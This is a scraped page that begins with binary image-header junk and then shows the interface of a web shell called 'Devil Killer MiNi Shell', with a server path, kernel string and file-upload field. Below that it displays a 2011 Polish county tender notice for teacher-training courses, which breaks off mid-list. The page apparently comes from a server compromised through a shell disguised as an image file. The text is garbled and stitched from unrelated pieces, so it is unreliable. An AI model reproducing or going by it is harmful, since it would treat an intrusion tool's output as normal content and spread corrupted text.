JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110405/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110405/106823-N-2011.html

<p class="kh_header"><b>Legionowo: szkolenie w ramach projektu Świadomy nauczyciel, czyli nowoczesna kadra oświatowa w szkołach powiatu legionowskiego</b><br>
<b>Numer ogłoszenia: 106823 - 2011; data zamieszczenia: 05.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Legionowski , ul. gen. Władysława Sikorskiego 11, 05-119 Legionowo, woj. mazowieckie, tel. 22 7840872, faks 22 7742551.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-legionowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> szkolenie w ramach projektu Świadomy nauczyciel, czyli nowoczesna kadra oświatowa w szkołach powiatu legionowskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przeprowadzenie szkoleń dla uczestników projektu Świadomy nauczyciel, czyli nowoczesna kadra oświatowa w szkołach powiatu legionowskiego, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, działanie 9.4, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
W ramach realizacji zamówienia Wykonawca zobowiązany jest do przeprowadzenia szkolenia, w tym realizacji części merytorycznej szkolenia, zapewnienia sal szkoleniowych, wyżywienia i zapewnienia uczestnikom materiałów szkoleniowych. W przypadku powierzenia części zamówienia podwykonawcom Zamawiający żąda wskazania, które części zamówienia będą powierzone.
Przedmiot zamówienia został podzielony na sześć ofert częściowych.
Do obowiązków Wykonawcy dla każdej oferty częściowej należy:
1) Zapewnienie sali szkoleniowej wraz z wyposażeniem
a) Wyposażenie:
- laptop z systemem operacyjnym Windows oraz pakietem biurowym umożliwiającym odtwarzanie prezentacji multimedialnych, 
- projektor multimedialny,
- ekran do projektora multimedialnego,
- mikrofon z nagłośnieniem,
- tablica typu flipchart wraz z 2 blokami papierowymi na każde szkolenie lub tablica ścieralna z 2 blokami papierowymi i 1 gąbką,
- pisaki do bloku papierowego lub tablicy ścieralnej (na każde szkolenie 2 komplety pisaków w kolorach: czarny, czerwony, zielony, niebieski)
- oznakowanie sal, w których będą odbywały się zajęcia, zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki
b) Warunki techniczne:
- sala szkoleniowa z wydzieloną powierzchnią na realizację części teoretycznej szkolenia oraz z powierzchnią przeznaczoną na ćwiczenia, zajęcia interaktywne, gry i warsztaty,
- miejsca siedzące - krzesła miękkie z obiciem tapicerskim i oparciem w ilości odpowiadającej ilości osób szkolonych i szkolących,
- ławki/stoły w ilości umożliwiającej uczestnikom szkolenia swobodną pracę - sporządzanie notatek i posługiwanie się materiałami szkoleniowymi,
- uczestnicy szkoleń muszą mieć zapewniony dostęp do węzła sanitarnego,
- sala musi posiadać dostęp do światła dziennego oraz system klimatyzacji,
- sala musi spełniać wszelkie wymogi bezpieczeństwa przewidziane przepisami BHP i P-POŻ.
2) Zapewnienie wyżywienia uczestnikom szkolenia
a) posiłki:
- w trakcie szkolenia Wykonawca zapewni uczestnikom oraz Trenerowi/Trenerom serwis kawowy składający się z: gorącej kawy (w ilości 500 ml/osobę), gorącej herbaty (w ilości 250 ml/osobę), wody mineralnej (w ilości 500 ml/osobę), ciast (dwa rodzaje o wadze łącznej 250 g/osobę), soków (dwa rodzaje w ilości 250 ml/osobę), mleka do kawy, cytryny, cukru, serwetek papierowych (w ilości 5 szt./osobę),
- serwis kawowy musi być serwowany w naczyniach szklanych i sztućcach stalowych,
- w trakcie szkolenia Wykonawca zapewni uczestnikom oraz Trenerowi/Trenerom lunch składający się z: I danie - zupa (450 ml/osobę), pieczywa (bułka lub chleb), II danie - mięso lub ryba (min. 250 g/osobę), ziemniaki/frytki/ryż (min. 300 g/osobę), 3 rodzaje surówek (w wadze łącznej 150 g/osobę), dodatkowo - kawa (200 ml/osobę), herbata (200 ml/osobę), sok owocowy (250 ml/osobę),
- lunch musi być podany w naczyniach szklanych i sztućcach stalowych,
- lunch musi być posiłkiem pełnowartościowym, zgodnie z technologią żywienia człowieka,
godziny przerw kawowych oraz lunchu muszą być ustalone w uzgodnieniu z Zamawiającym, stosownie do harmonogramu każdego ze szkoleń,
b) warunki techniczne:
- serwis kawowy musi być zorganizowany w miejscu znajdującym się w bezpośrednim sąsiedztwie sali szkoleniowej,
- sala restauracyjna musi pomieścić minimum 17 osób, 
- sala musi spełniać wszelkie wymogi bezpieczeństwa przewidziane przepisami BHP i P-POŻ oraz Inspektora Sanitarnego.
3) Zapewnienie materiałów szkoleniowych dla uczestników szkoleń, przy czym materiały szkoleniowe muszą zawierać: logo POKL, logo Unii Europejskiej wraz z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego, logo powiatu legionowskiego oraz informację Projekt jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
4) Przeprowadzenie na koniec każdego szkolenia ankiety ewaluacyjnej wśród uczestników szkolenia. Odpowiednią ilość ankiet ewaluacyjnych Wykonawca otrzyma od Zamawiającego przed rozpoczęciem szkolenia. 
5) Przygotowanie i wręczenie uczestnikom zaświadczeń potwierdzających udział w szkoleniu.
6) Przekazanie Zamawiającemu, po zakończeniu szkolenia dokumentów:
- listę obecności z własnoręcznymi podpisami uczestników szkolenia w każdym dniu szkolenia oraz podpisem Trenera/Trenerów (jeżeli dane szkolenie prowadzone będzie przez zespół trenerski),
- program szkolenia i dziennik zajęć podpisany przez Trenera/Trenerów (jeżeli dane szkolenie prowadzone będzie przez zespół trenerski),
- potwierdzenie odbioru materiałów szkoleniowych wraz z jednym egzemplarzem materiałów,
- kopie wydanych zaświadczeń oraz listę potwierdzającą ich odbiór przez uczestników szkolenia, 
- wypełnione przez uczestników ankiety ewaluacyjne.
7) Podczas realizacji szkolenia Wykonawca zobowiązany jest informować uczestników szkoleń o fakcie współfinansowania szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
1. Oferta częściowa nr 1 Kurs kierowników wycieczek szkolnych
Termin realizacji usługi: maj/czerwiec 2011 r. (dokładna data szkolenia ustalona zostanie z wybranym w ramach postępowania o udzielenie zamówienia publicznego Wykonawcą)
Planowana ilość grup szkoleniowych: 1
Czas trwania 1 kursu dla 1 grypy: 2 dni - po 5 godz. lekcyjnych - łącznie 10 godz. 
Planowana liczba uczestników 1 grupy szkoleniowej: od 13 do 15 osób + wykładowca/wykładowcy (jeżeli dane szkolenie prowadzone będzie przez zespół trenerski)
Ostateczną liczbę uczestników szkolenia Zamawiający przedstawi Wykonawcy w terminie nie późniejszym niż 3 dni przed rozpoczęciem danego szkolenia.
1) Realizacja części merytorycznej kursu, zgodnie ze szczegółowym harmonogramem realizacji przedmiotu zamówienia, który Wykonawca załączy do składanej oferty. W zakres realizacji kursu wchodzi m.in.: 
Uwzględnienie w zakresie merytorycznym kursu następujących zagadnień:  
a) przepisy regulujące organizację turystki szkolnej, 
b) organizacja wycieczek szkolnych,
c) obowiązki kierownika wycieczek,
d) bezpieczeństwo życia i zdrowia uczestników wycieczek szkolnych,
e) zasady udzielania pierwszej pomocy przedlekarskiej.   

2. Oferta częściowa nr 2 Profilaktyka uzależnień i zachowań destrukcyjnych
Termin realizacji usługi: maj/czerwiec 2011 r. (dokładna data szkolenia ustalona zostanie z wybranym w ramach postępowania o udzielenie zamówienia publicznego Wykonawcą).
Planowana ilość grup szkoleniowych: 1
Czas trwania 1 szkolenia dla 1 grupy: 1 dzień - 6 godz. lekcyjnych 
Planowana liczba uczestników 1 grupy szkoleniowej: od 13 do 15 osób + wykładowca/wykładowcy (jeżeli dane szkolenie prowadzone będzie przez zespół trenerski).
Ostateczną liczbę uczestników szkolenia Zamawiający przedstawi Wykonawcy w terminie nie późniejszym niż 3 dni przed rozpoczęciem danego szkolenia.
1) Realizacja części merytorycznej szkolenia, zgodnie ze szczegółowym harmonogramem realizacji przedmiotu zamówienia, który Wykonawca załączy do składanej oferty. W zakres realizacji szkolenia wchodzi m.in.: 
Uwzględnienie w zakresie merytorycznym szkolenia następujących zagadnień:  
a) warunki, formy i metody skutecznych działań profilaktycznych w szkole,
b) podstawowe zasady konstruowania szkolnych programów profilaktycznych,
c) przykłady profesjonalnych działań profilaktycznych i Szkolnych Programów Profilaktycznych,
d) możliwości pozyskiwania zewnętrznych środków finansowych na szkolne działania profilaktyczne.
2) W ramach szkolenia 1 godz. zajęć musi być poświęcona na indywidualne konsultacje uczestników z trenerem/trenerami.
3. Oferta częściowa nr 3 Przygotowanie uczniów do egzaminu zawodowego
Termin realizacji usługi: kwiecień/maj 2011r. (dokładna data szkolenia ustalona zostanie z wybranym w ramach postępowania o udzielenie zamówienia publicznego Wykonawcą).
Planowana ilość grup szkoleniowych: 2
Czas trwania 1 szkolenia dla 1 grupy: 3 dni - po 5 godz. lekcyjnych - łącznie 15 godz.
Planowana liczba uczestników 1 grupy szkoleniowej: od 12 do 15 osób + wykładowca/wykładowcy (jeżeli dane szkolenie prowadzone będzie przez zespół trenerski)
Ostateczną liczbę uczestników szkolenia Zamawiający przedstawi Wykonawcy w terminie nie późniejszym niż 3 dni przed rozpoczęciem danego szkolenia.
1) Realizacja części merytorycznej szkolenia, zgodnie ze szczegółowym harmonogramem realizacji przedmiotu zamówienia, który Wykonawca załączy do składanej oferty. W zakres realizacji szkolenia wchodzi m.in.: 
Uwzględnienie w zakresie merytorycznym szkolenia następujących zagadnień:  
a) analiza obowiązujących podstaw programowych i standardów egzaminacyjnych w zawodach nauczanych na terenie powiatu legionowskiego,
b) ćwiczenia związane z rozwiązywaniem zadań egzaminacyjnych w powyższych zawodach,
c) uświadomienie uczniom roli egzaminu zawodowego dla środowiska pracodawców.
2) Zapewnienie metodologii realizacji szkolenia w proporcji: 1/2 wykład z wykorzystaniem technik multimedialnych, ? warsztaty, ćwiczenia. W ramach szkolenia 1 godz. zajęć musi być poświęcona na indywidualne konsultacje uczestników z trenerem/trenerami.

4. Oferta częściowa nr 4 Jak zbudować program naprawczy w zakresie podniesienia efektywności kształcenia zawodowego
Termin realizacji usługi: czerwiec 2011 r. (dokładna data szkolenia ustalona zostanie z wybranym w ramach postępowania o udzielenie zamówienia publicznego Wykonawcą).
Planowana ilość grup szkoleniowych: 1
Czas trwania 1 szkolenia dla 1 grupy: 3 dni - po 5 godz. lekcyjnych - łącznie 15 godz.
Planowana liczba uczestników 1 grupy szkoleniowej: od 12 do 15 osób + wykładowca/wykładowcy (jeżeli dane szkolenie prowadzone będzie przez zespół trenerski).
Ostateczną liczbę uczestników szkolenia Zamawiający przedstawi Wykonawcy w terminie nie późniejszym niż 3 dni przed rozpoczęciem danego szkolenia.
1) Realizacja części merytorycznej szkolenia, zgodnie ze szczegółowym harmonogramem realizacji przedmiotu zamówienia, który Wykonawca załączy do składanej oferty. W zakres realizacji szkolenia wchodzi m.in.: 
Uwzględnienie w zakresie merytorycznym szkolenia następujących zagadnień:  
a) wypracowanie metodyki tworzenia szkolnych programów nauczania dla zawodu oraz pisania tych programów, 
b) opracowanie szkolnych planów nauczania na poziomie technikum z uwzględnieniem przedmiotów rozszerzonych ogólnokształcących (nowa matura w technikum po 2012 r.) związanych z nauczanym zawodem - zgodnie z nowymi podstawami programowymi  kształcenia ogólnego. 
2) Zapewnienie metodologii realizacji szkolenia w proporcji: 1/2 wykład z wykorzystaniem technik multimedialnych, ? warsztaty, ćwiczenia. W ramach szkolenia 1 godz. zajęć musi być poświęcona na indywidualne konsultacje uczestników z trenerem/trenerami.

5. Oferta częściowa nr 5 Praktyczne i problemowe metody nauczania przedmiotów zawodowych
Termin realizacji usługi: czerwiec 2011 r. (dokładna data szkolenia ustalona zostanie z wybranym w ramach postępowania o udzielenie zamówienia publicznego Wykonawcą).
Planowana ilość grup szkoleniowych: 2
Czas trwania 1 szkolenia dla 1 grupy: 2 dni - po 4 godz. lekcyjne - łącznie 8 godz. 
Planowana liczba uczestników 1 grupy szkoleniowej: od 12 do 15 osób + wykładowca/wykładowcy (jeżeli dane szkolenie prowadzone będzie przez zespół trenerski)
Ostateczną liczbę uczestników szkolenia Zamawiający przedstawi Wykonawcy w terminie nie późniejszym niż 3 dni przed rozpoczęciem danego szkolenia.
1) Realizacja części merytorycznej szkolenia, zgodnie ze szczegółowym harmonogramem realizacji przedmiotu zamówienia, który Wykonawca załączy do składanej oferty. W zakres realizacji szkolenia wchodzi m.in.: 
Uwzględnienie w zakresie merytorycznym szkolenia następujących zagadnień:  
a) realizacja metod aktywnych np. projektów, metaplanu w kształceniu zawodowym, 
b) współpraca z pracodawcami w zakresie wypracowania wspólnego programu kształcenia praktycznego  w danym zawodzie. 
2) Zapewnienie metodologii realizacji szkolenia w proporcji: 1/2 wykład z wykorzystaniem technik multimedialnych, ? warsztaty, ćwiczenia. W ramach szkolenia 1 godz. zajęć musi być poświęcona na indywidualne konsultacje uczestników z trenerem/trenerami.

6. Oferta częściowa nr 6 Analiza i interpretacja wyników sprawdzianu/egzaminów zewnętrznych oraz ich wykorzystanie do poprawy jakości kształcenia
Termin realizacji usługi: kwiecień/maj 2011 r. (dokładna data szkolenia ustalona zostanie z wybranym w ramach postępowania o udzielenie zamówienia publicznego Wykonawcą).
Planowana ilość grup szkoleniowych: 3
Czas trwania 1 szkolenia dla 1 grupy: 2 dni - po 4 godz. lekcyjne - łącznie 8 godz. 
Planowana liczba uczestników 1 grupy szkoleniowej: od 12 do 15 osób + wykładowca/wykładowcy (jeżeli dane szkolenie prowadzone będzie przez zespół trenerski)
Ostateczną liczbę uczestników szkolenia Zamawiający przedstawi Wykonawcy w terminie nie późniejszym niż 3 dni przed rozpoczęciem danego szkolenia.
1) Realizacja części merytorycznej szkolenia, zgodnie ze szczegółowym harmonogramem realizacji przedmiotu zamówienia, który Wykonawca załączy do składanej oferty. W zakres realizacji szkolenia wchodzi m.in.: 
Uwzględnienie w zakresie merytorycznym szkolenia następujących zagadnień:  
a) omówienie aktów prawnych związanych z egzaminem zawodowym,
b) analiza wyników egzaminów zawodowych z trzech ostatnich lat w zawodach nauczanych na terenie powiatu legionowskiego,
c) wypracowanie rozwiązań związanych z: poprawą efektywności kształcenia i uczestnictwa absolwentów szkół w egzaminach zawodowych.
2) Zapewnienie metodologii realizacji szkolenia w proporcji: 1/2 wykład z wykorzystaniem technik multimedialnych, ? warsztaty, ćwiczenia. W ramach szkolenia 1 godz. zajęć musi być poświęcona na indywidualne konsultacje uczestników z trenerem/trenerami.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.30.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku posiadania doświadczenia, Zamawiający uzna wykazanie się przez Wykonawcę w okresie 3 ostatnich lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) przed upływem terminu składania ofert, co najmniej dwiema usługami porównywalnymi z przedmiotem zamówienia - z zastrzeżeniem, że przez usługę porównywalną z przedmiotem zamówienia Zamawiający rozumie przeprowadzenie szkolenia o tematyce odpowiadającej danej części zmówienia wraz z jego kompleksową obsługą - spełnienie warunku weryfikowane będzie na podstawie wykazu wykonanych lub wykonywanych usług z podaniem ich wartości, przedmiotu, dat wykonywania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia - Zamawiający uzna, gdy Wykonawca dysponuje lub będzie dysponował, co najmniej jedną osobą (trenerem) do realizacji danego szkolenia posiadającego wykształcenie odpowiadające zakresowi tematycznemu szkolenia oraz min. 3 letnie doświadczenie dydaktyczne (tj. w prowadzeniu wykładów i/lub szkoleń i/lub wygłaszania referatów na konferencjach itp.) - spełnienie warunku weryfikowane będzie na podstawie wykazu osób, które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>zaakceptowany (parafowany) wzór umowy przez Wykonawcę, oświadczenie o spełnianiu warunków art. 22 ust. 1 ustawy Prawo zamówień publicznych</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - doświadczenie - 30</li>
<li>3 - zastępowalność kluczowego personelu - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany istotnych postanowień zawartej umowy w następujących przypadkach:
1) gdy zmiany są korzystne dla Zamawiającego lub neutralne dla Stron umowy,
2) gdy konieczność zmiany umowy jest spowodowana okolicznościami, których Strony nie mogły przewidzieć w chwili zawierania umowy, a jednocześnie za wystąpienie tych okoliczności nie ponosi odpowiedzialności Wykonawca,
3) w razie zmiany wysokości stawki VAT Strony dokonują zmiany uwzględniającej nową wysokość tej stawki,
